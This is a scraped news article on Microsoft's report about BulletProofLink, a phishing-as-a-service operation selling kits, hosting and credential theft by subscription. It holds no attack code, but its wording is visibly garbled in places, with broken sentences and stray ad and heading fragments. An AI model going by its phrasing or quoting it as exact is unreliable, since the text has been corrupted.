Microsoft Warns of Large-Scale Phishing-as-a-Service



[ad_1]

Microsoft has opened the veil on a large-scale phishing-as-a-service (PHaaS) operation that involves selling phishing kits and email templates as well as providing low-cost hosting and automated services. cost, thus allowing cyber actors to purchase phishing campaigns and deploy them with minimal effort.

“With over 100 phishing models available that mimic well-known brands and services, Operation BulletProofLink is responsible for many phishing campaigns impacting businesses today,” said the Microsoft 365 Defender Threat team. Intelligence in a report released Tuesday.

“BulletProofLink (also referred to as BulletProftLink or Anthrax by its operators in various websites, advertisements and other promotional materials) is used by several groups of attackers in business models based on a one-time or monthly subscription, creating a constant revenue stream for its the operators.”

The tech giant said it discovered the operation during its investigation of a credential phishing campaign that used the BulletProofLink phishing kit on sites controlled by attackers or on sites provided by BulletProofLink in the part of their service. The existence of the operation was first made public by OSINT Fans in October 2020.

Phishing as a service differs from traditional phishing kits in that unlike the latter, which are sold as one-time payments to access packaged files containing ready-to-use email phishing templates. employment, they are subscription-based and follow a software-as-a-service model, while also expanding capabilities to include integrated site hosting, email delivery and information theft. identification.

Believed to have been active since at least 2018, BulletProofLink is known to operate an online portal to advertise their toolset for up to $ 800 per month and allow cybercriminal gangs to sign up and pay for. the service. Customers can also get a 10% discount if they choose to subscribe to their newsletter, not to mention paying between $ 80 and $ 100 for credential phishing patterns that allow them to steal. credentials entered by unsuspected victims by clicking a malicious URL in the email message. .

Corporate password management

Disturbingly, stolen credentials are not only sent to attackers, but also to BulletProofLink operators using a technique called ‘double theft’ in a modus operandi that mirrors the double extortion attacks used by gangs. of ransomware.

“With phishing kits it is trivial for operators to include a secondary location for sending credentials and hope that the buyer of the phishing kit does not modify the code to remove it,” the researchers said. “This is true for the BulletProofLink phishing kit, and in cases where attackers using the service received credentials and logs after a week instead of running campaigns themselves, operator PhaaS has retained control over all of the credentials it resells. “



[ad_2]

Source link